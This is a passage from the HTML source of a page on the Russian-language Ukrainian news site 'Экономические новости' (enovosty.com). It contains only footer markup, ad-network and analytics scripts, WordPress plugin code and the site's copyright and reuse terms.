недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br><div id="help" style="margin-bottom: 15px;"><a href="http://mistoditey.org/o-nas/missiya-centra/?lang=uk " target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/mistoditey.gif"></a></div><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-588"></div><script type="text/javascript">new MTr('300-588', {site:907,format:0});</script><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4778294"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <link rel='stylesheet' id='wsl-widget-css' href='https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/css/style.css' type='text/css' media='all' /><script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4778294","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "e6592a5402";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> </body></html>